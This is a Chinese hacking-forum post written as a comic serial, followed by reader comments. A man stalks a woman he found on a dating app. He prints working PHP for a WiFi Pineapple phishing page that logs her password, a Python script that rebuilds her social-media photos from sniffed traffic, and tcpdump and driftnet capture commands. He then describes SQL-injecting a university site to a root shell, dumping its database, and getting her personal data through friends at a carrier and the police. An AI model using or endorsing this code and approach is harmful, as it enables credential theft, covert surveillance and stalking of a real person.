卧薪尝胆只为你(屌丝黑客"追"妹记第二集)
「好大的一朵菊花哟~」
-----------------------------
< / Scorpion echo ‘世界由我来守护’>
PS:大家当小说看不要以技术的眼光去评判,不当之处请忽略勿喷 内行人看门道,外行人看热闹,请不要再教我如何把妹了,就当一个热闹和故事来看就行了
精彩回顾:第一集地址https://www.t00ls.com/thread-31253-1-1.html
第一章:“约炮神器”帮我找到了她
在上一集中Only成功的吓走了妹子,妹子回去对电脑进行了全面的杀毒,最终Only的权限还是掉了,他有一点点的失落,只盼着有一天能和她在人群中相遇,就想问她一句话“为什么要杀毒”
这天Only跟平常一样熟练的打开各种社交软件在搜附近人,什么QQ啊微信啊,陌陌啊,探探啊,派派啊都被Only玩的了如指掌,突然看到这么一个消息,
Only表现的是异常兴奋啊,这不就是自己的"梦中情人"
“0.75KM”Only拿这手机出去寻找着,最终确定了妹子所在的位置,Only高兴的跑了回来,带上所有的装备前往目的地,北方的3月天气里,晚上吹着小风,有点冷飕飕的感觉,Only带了好几个装逼神器,所用的装备有
1、军区大衣加手套一双,口罩一个,
2、航拍飞行器,
3、WiFi Pineapple
4、3G无线网卡
5、一个超大功率的无线网卡卡皇
7、笔记本一套
听到这我表示很诧异,这货是预谋已久啊,从装备上来看果然是黑阔,Only来到了妹子所在的单元楼下,找了一个阴暗的角落,把无线网卡插到WiFi Pineapple的USB上后进行设置
设置完后把WiFi Pineapple的无线密码改成了conspiracy,然后配置了一个钓鱼站点,他用的是WiFi Pineapple里面的DNS欺骗当然我们可以用别的方法来欺骗
意思就是修改一个网页把提交的表单修改和error.php里一样然后我们在我们修改的网页中输入账号密码会提交到error.php里然后保存到/tmp/pineapple-phish.log里面,而redirect.php就是我们DNS欺骗用到的,当我们输入的网址内含有COM会跳转到WiFi Pineapple - Login.htm(我们修改的网页)
redirect.php:
<?php
$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];
if (strpos($ref, "com")){
header('Status: 302 Found');
header('Location: WiFi Pineapple - Login.html');
}
require('error.php');
?>
<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
$nam = stripslashes($_POST['name']);
$pas = stripslashes($_POST['pass']);
$nam = htmlspecialchars($nam, ENT_QUOTES);
$pas = htmlspecialchars($pas, ENT_QUOTES);
$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;
$filed = @fopen("/tmp/pineapple-phish.log", "a+");
@fwrite($filed, "$content\n");
@fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body>
</body></html>
PS:做的有点丑,大家凑合看就行了
Only做好后开启了DNS欺骗模式
然后将菠萝派安置到了飞行器上,笔记本连上卡皇后再链接上菠萝派的wifi(此目的是因为飞行器飞高后wifi的范围丢失,所以用的卡皇)
这时候看妹子距离我不过30M左右,操控这飞行器飞到2-3楼的中间
然后Only在陌陌中告诉了妹子wifi名称和密码,看到消息已读,Only邪恶的笑了,不一会妹子回复了个"谢谢"
一股股寒风吹过,Only不停的刷新着文件夹希望出现期盼中的pineapple-phish.log,难得妹纸没连上?
确实有连上啊,2个设备.151是我,.24肯定是妹纸了,但还是仍不住在陌陌上问了下妹纸,
“连上了吗?”
“恩”
Only疑惑为什么不上网呢,难得妹纸就是只在聊天看视频? Only想向妹纸推送一个网页自动弹出,但是又想起上次的结果,这次一定要忍住,决不能打草惊蛇,Only默默的念着,不知不觉已经到了晚上8点,一股股寒风袭来,Only不经意的打了个颤,有点迷糊了,差点睡着了,刷新了下文件夹,Only喜出望外,看到了梦寐以求的pineapple-phish.log
然后一看手机,看到了妹子发来的信息
“为什么打不开网页,一直提示让我认证”
Only立马回复
“应该是路由出错了,我重启下”
妹子没有怀疑,Only立马关掉了DNS欺骗,差点吓死了,Only默念着,出了一头的冷汗,Only立马搜索微信验真伪,看来是真的,知道了妹子的QQ,手机以及微信,Only本想着以及得到了想要的赶紧撤,谁知道好奇心太重,开启了URL Snarf (kali同理),于是准备一探虚实
PS:以下是本地手机演示
看到这一排排数据,Only显得越发的高兴
然后他把数据拷贝下来准备读取数据
PS:这是视频
当然还有一些小视频啊,语音啊 空间的说说啊 快手之类的,大家自由发挥吧
du.py:
import re
text = open("1.txt", "r")
png = open('text3.html','w')
while True:
line = text.readline()
if 'mmsns.qpic.cn' in line:
pat = re.compile('GET(.*)?tp=',re.S) # 微信圈的图片
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
if 'img.momocdn.com/feedimage/' in line:
pat = re.compile('GET(.*?)webp',re.S) # 陌陌圈的嗅探
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'jpg></img>'
print text3
png.write(text3)
if 'nipic.com' in line:
pat = re.compile('GET(.*?) HTTP',re.S) # QQ相册
result = pat.findall(line)
text2= ''.join(result)
text3='<img src='+text2+'></img>'
print text3
png.write(text3)
text.close()
png.close()
读取一个指定pcap数据包中的图片:
driftnet -f /home/dump_1443200994.pcap -a -d /home/
tcpdump -i wlan0 -nn -w /mnt/sda1/tcpdump.cap port 80 &
也许是因为Only太无聊了吧,看了一会也没有发现什么妹子的自拍视频之类的
额外的还是有一些失落的,收拾了下Only准备回家了,这次Only并没有视图这去获取权限什么的,只是简单的得到了一些信息,回去后妹子发来了信息,问为什么没网了,
Only回答到 “我要睡觉了”,
妹子无奈的"哦”了一下
也没有聊了起来,因为这样的社交软件上献殷勤势必会引起妹子的反感的
第二章:为了你我做什么都可以
Only回去后在各种裤子查起了妹子的QQ号,手机号之类的,各种百度,搜狗 谷歌,最终眼睛一亮,一网站出现了妹子的手机号,点开后原来是某某大学的网站,原来是个舞蹈老师,上面清楚的写着在那次比赛中得了第一名,名字 电话,Only又邪恶了
“难不成又要我日站?我勒个X”
想想都觉得累
打开网站翻了翻果然有
既然旁站好几个,那就柿子就挑软的捏
Only拿出了WebRobot爬了下站
神器就是神器啊果然很强,但是效果还不是很明显,在官方上找啊找啊找,点开新闻中心后是这样子的
难不成把参数隐藏了
继续拿神器来扫下
点开抓取链接 果然被猜到了 是真的
全部发送注入扫描里
看来是存在注入的,那已经成功了一半了
本想着手工拿下 可以一注入 不管输入什么就弹回去了,用什么萝卜头啊之类的也没用,卧槽,看来还是得神器来搞
果然神器就是神器,不一会出现了Only想要的东西
然后登录后台
“ 卧槽,这么简单,搞毛啊,为什么啊测试版,这算个毛啊 %¥@#!@# ”
Only仍不住的骂了起来
但是还是静下心来,右手掏进右边口袋,取了一盒东西出来,掏出一根白色的
类似柱状的物体放在嘴里叼着,左手插入左边口袋取出打火机,右手成弯弓状态护住左手打火机点燃了哪根柱状物体,深吸一口,美妙极了!
仔细的看了看网站,最终还是发现了一个突破口
“ 卧槽,什么情况,玩我呢,这么简单的站居然有这么傻逼的洞!害的我还白失落了一会 ”
Only拿到shell后 root权限
这站让Only一头冷汗,好让人蒙羞啊,Only激动不已,这管理果然是SB,从后台的那几个"测试版"大字上就猜到了,
“看来这是老天要帮我啊”
Only登上服务器脱下裤子
日了个底朝天,最终Only想要的还是工资查询的裤子
Only是什么都想干,什么都想挑战,这时候Only想这么SB的管理员难道注入可以直接写shell?又一次得到了验证
拿到数据库后,Only搜索了下名字,得到身份证后,这下Only发大招了,把查出来的身份证号发给了自己的2个朋友,
一个在运营商那里,一个是警察,得到了以下信息(人生在世,没有几个各行各业的朋友,还活什么,必要时可以像这样帮下忙)
确定了妹子的手机号和自己得到的是同一个,也没有其他手机号,也确定了妹子的个人信息和家庭信息
但是Only为什么要得到这些信息?
得到这些信息后他又要干什么呢?
Only又会做一些什么疯狂的事情呢?
和妹子会有什么奇妙的故事发生呢?
这一切的一切都成了迷
想知道答案的话
尽情期待下一集
<Only失忆了>
自评TCV值(5)
评论230次
高大上的设备,高大上的情节
在Only做这些工作的时候,妹纸接了个电话:嗯 好哒,还在上次那个酒店么。我现在就过去 么么哒
为了泡妹子啥都用上了... 就差无人机去偷拍了~
我觉得这样子,一般是泡不到妹子的。
首先谢谢楼主分享啦,然后想说能把技术搞成这样的,也是必然是缺妹子导致的啊
明显还是追不到、、、
我竟然看完了...!!! 看完了...看完了.... 要是妹子知道了不得了
这。。。。把日站过程打包成小说你也是黑阔界第一人了。。。
文中的黑阔行动力爆表
飞行器+大菠萝,装逼专业户啊!看着描述 可行性 还是比较高的。
嗯 看过第一季 又看到新姿势了 期待LZ下一季
主要还是看脸,要不掌握这些信息都没用,怎么上?
真是软硬通吃的,技术实在佩服。
哥们,露点了。。。。。
嘘!别乱搞,小说而已
Google is awesome
好吧 请把这条回复删了吧 毕竟是2会期间以免被人XXOO
哥们,露点了。。。。。
嘘!别乱搞,小说而已
求指出,这个站只是个小插曲而已
Google is awesome
lz 直接上楼敲门吧。 妹纸也寂寞 各种交友软件都玩得开
有的妹纸玩社交软件只是想分享下心情而已,你和她去聊天她还不愿意搭理你的那种,反而很反感,再加上这只是小说而已,得有点故事情节
很详细,很精彩
果然黑客是最可怕其他LZ下一步
lz 直接上楼敲门吧。 妹纸也寂寞 各种交友软件都玩得开
前几天刚看完第一部,有一种意犹未尽的感觉,结果今天一来就看见第二季啊。第一季感觉ONLY就是一个纯屌丝,第二季主角有种逆袭的感觉,变身高富帅,这一套设备很是牛逼啊。但是据我了解,目前主流的无人机,飞行时间都在10到15分钟左右!不知道楼主是怎么控制电量的。还有对故事以及这种泡妞方法,给个赞啊。如果能上去就一顿吻,不知道会是什么结果。哈哈
一般20分钟左右还是可以的,飞不了那么高那么远。只是10米左右的样子,坚持个半小时也不难。再加上有备用电池的